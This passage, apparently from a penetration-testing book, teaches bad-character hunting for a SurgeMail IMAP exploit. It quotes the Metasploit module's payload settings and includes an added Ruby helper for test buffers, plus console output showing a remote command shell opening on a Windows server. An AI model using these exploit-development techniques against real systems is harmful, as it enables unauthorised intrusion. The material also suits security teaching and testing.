Creating Your Own Exploits
mangled and marking that character as bad. One of the fastest methods, however, is to find the bad characters in the source code of similar exploits. For example, a search of the IMAP exploits as of this writing finds \x00\x09\x0a\x0b\x0c\x0d\x20\x2c\x3a\x40\x7b listed as bad characters, as shown next. That list is typical for a text-based protocol: a null byte terminates a C string, while carriage return, line feed, space and the other listed punctuation act as command delimiters in IMAP, so any of them cut the buffer short before the payload lands intact.
    'Privileged'     => false,
    'DefaultOptions' =>
      {
        'EXITFUNC' => 'thread',
      },
    'Payload'        =>
      {
        'Space'       => 10351,
        'DisableNops' => true,
        'BadChars'    => "\x00\x09\x0a\x0b\x0c\x0d\x20\x2c\x3a\x40\x7b"
      },
    'Platform'       => 'win',
    'Targets'        =>
When you declare 'BadChars' in an exploit module, Metasploit automatically excludes those bytes from the encoded shellcode, from the NOP sled, and from any automatically generated strings of text: the encoder that is selected must produce output free of every listed byte, and the payload generation fails rather than sending a buffer that contains one.
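The two sides of the procedure described above, as an added example that is not part of the book or of the surgemail module: building the byte-by-byte test buffer that is sent to find characters that get mangled, spotting the first mangled byte when the sent buffer is compared with what a debugger shows in memory, and checking an encoded payload against a BadChars list the way Metasploit's encoders do. The function names and the sample "seen in memory" buffers are assumptions constructed for this example.

```ruby
# Added example, not from the book or the Metasploit module.
# Helpers for the bad-character hunt around an exploit's 'BadChars' list.

# The BadChars string quoted from the surgemail module.
SURGEMAIL_BADCHARS = "\x00\x09\x0a\x0b\x0c\x0d\x20\x2c\x3a\x40\x7b".b

# Build the classic 0x01..0xff test buffer, omitting bytes already known to
# be bad, so each run sends every remaining candidate exactly once.
# (0x00 is never sent: it ends a C string and is bad almost everywhere.)
def badchar_test_buffer(known_bad = "".b)
  bad = known_bad.bytes
  (1..255).reject { |b| bad.include?(b) }.pack("C*")
end

# Compare the buffer that was sent with the copy found in memory (for
# example pasted from a debugger dump) and return the first mismatch as
# [offset, sent_byte, seen_byte], with seen_byte nil when the copy was
# truncated there. Only the first mismatch is meaningful: once a byte is
# dropped or rewritten, everything after it shifts and would also differ.
def first_mangled(sent, seen)
  sent.bytes.each_with_index do |b, i|
    got = seen.getbyte(i)
    return [i, b, got] if got != b
  end
  nil
end

# The check Metasploit's encoders apply to their output: which bytes of the
# payload appear in the BadChars list. An empty array means the payload is
# safe to send as far as the declared bad characters go.
def badchar_violations(payload, badchars)
  bad = badchars.bytes
  payload.bytes.select { |b| bad.include?(b) }.uniq
end

if __FILE__ == $PROGRAM_NAME
  sent = badchar_test_buffer
  # Constructed sample: the server truncated the buffer at the line feed.
  seen = sent.byteslice(0, 9)
  p first_mangled(sent, seen)        # [9, 10, nil] => add \x0a, rerun
  p badchar_test_buffer(SURGEMAIL_BADCHARS).bytesize
end
```

Each round of the hunt is the same loop: send `badchar_test_buffer(known_bad)`, compare the memory copy with `first_mangled`, append the reported byte to `known_bad`, and repeat until the whole buffer arrives untouched; the final `known_bad` is what goes into 'BadChars'.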
When we run the exploit again after declaring the bad characters, as shown next, we finally get a session on the third try. The exploit still isn't reliable, which means the list is not yet complete: because Metasploit encodes the shellcode differently on each run, a byte that is bad but not yet declared in 'BadChars' appears in some generated payloads and not in others, so the module fails only some of the time.
msf exploit(surgemail_book) > rexploit
[*] Started bind handler
[*] Authenticating as test with password test...
[*] Sending payload
[*] Exploit completed, but no session was created.
msf exploit(surgemail_book) > rexploit
[*] Started bind handler
[*] Authenticating as test with password test...
[*] Sending payload
[*] Exploit completed, but no session was created.
msf exploit(surgemail_book) > rexploit
[*] Started bind handler
[*] Authenticating as test with password test...
[*] Sending payload
[*] Command shell session 1 opened (192.168.1.101:59501 -> 192.168.1.155:4444)
(C) Copyright 1985-2001 Microsoft Corp.
c:\surgemail>